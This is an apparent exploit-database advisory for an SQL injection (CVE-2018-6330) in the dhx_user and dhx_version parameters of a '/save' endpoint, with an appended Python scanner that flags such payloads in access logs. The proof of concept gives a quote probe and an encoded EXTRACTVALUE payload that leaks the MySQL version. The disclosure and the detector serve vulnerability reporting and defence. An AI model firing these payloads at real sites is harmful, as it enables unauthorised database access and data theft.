#Exploit Title: Laravel SQL Injection 5.4.15

#Date: 26.01.2018

#Software Link: https://laravel.com/

# Exploit Author: Gianluca Bonanno

# Contact: Gianluca.bonanno@i-sec.tuv.com

# CVE: CVE-2018-6330

# Category: Webapps

# Version : 5.4.15

# Tested on : Apache 2.4.29

  1. Description

Any registered user can exploit the SQL injection because the input is not sanitized inside save.php. The affected parameters are dhx_user and dhx_version.

  2. Proof of Concept

Login as user, then request:

GET /save?dhx_user=1516954053138'&dhx_version=1&swt_subdomain=center01 HTTP/1.1
Host: xxxxxx.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://xxxxxxx.net/agenda
X-Requested-With: XMLHttpRequest

Response will be:

You have an Error in your Mysql Syntax.

To show the database version, the following payload can be sent:

dhx_user=1516954053138%27%29%20AND%20EXTRACTVALUE%282263%2CCONCAT%280x5c%2C0x7171766b71%2C%28MID%28%28IFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C21%29%29%2C0x7176787171%29%29--%20WWGj

The response will look like this:

[…]
<span class="exception_message">PDO – sql execution failed<br />
XPATH syntax error: '\qqvkq5.7.18-1qvxqq'</span>
[…]
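As an added defensive example (not part of the advisory): a small Python scanner that URL-decodes the dhx_user and dhx_version parameters of /save requests in Apache access-log lines and flags values that are not plain numeric ids, contain quotes, or carry SQL keywords such as EXTRACTVALUE. The log lines below are constructed, and the assumption that both parameters are numeric in legitimate traffic is mine.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the advisory). Line 2 carries the
# single-quote probe and line 3 a shortened form of the EXTRACTVALUE payload shape.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Jan/2018:10:00:01 +0100] "GET /save?dhx_user=1516954053138&dhx_version=1&swt_subdomain=center01 HTTP/1.1" 200 512
10.0.0.5 - - [26/Jan/2018:10:00:09 +0100] "GET /save?dhx_user=1516954053138%27&dhx_version=1&swt_subdomain=center01 HTTP/1.1" 500 2048
10.0.0.5 - - [26/Jan/2018:10:00:15 +0100] "GET /save?dhx_user=1516954053138%27%29%20AND%20EXTRACTVALUE%281%2CCONCAT%280x5c%2CVERSION%28%29%29%29--%20x&dhx_version=1 HTTP/1.1" 500 2048
"""

WATCHED_PARAMS = ("dhx_user", "dhx_version")  # the two parameters named in the advisory
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# MySQL error-based injection markers worth alerting on in a numeric id field
SQLI_MARKERS = re.compile(r"(EXTRACTVALUE|UPDATEXML|CONCAT|VERSION\s*\(|--\s|/\*|\bAND\b|\bOR\b)", re.I)


def inspect_request_target(target):
    """Return a list of (param, reasons) findings for one decoded request target."""
    findings = []
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)  # percent-decodes values
    for name in WATCHED_PARAMS:
        for value in qs.get(name, []):
            if value.isdigit():  # assumption: legitimate ids are purely numeric
                continue
            reasons = []
            if "'" in value or '"' in value:
                reasons.append("quote")
            if SQLI_MARKERS.search(value):
                reasons.append("sql-keyword")
            if not reasons:
                reasons.append("non-numeric")
            findings.append((name, ",".join(reasons)))
    return findings


def scan_log(text):
    """Scan access-log text; return (line number, status, findings) for suspicious /save hits."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if not m or not m.group("target").startswith("/save"):
            continue
        findings = inspect_request_target(m.group("target"))
        if findings:
            alerts.append((lineno, m.group("status"), findings))
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Correlating a flagged request with a 500 response (the MySQL syntax error the advisory describes) is a useful second signal when tuning this for a real log.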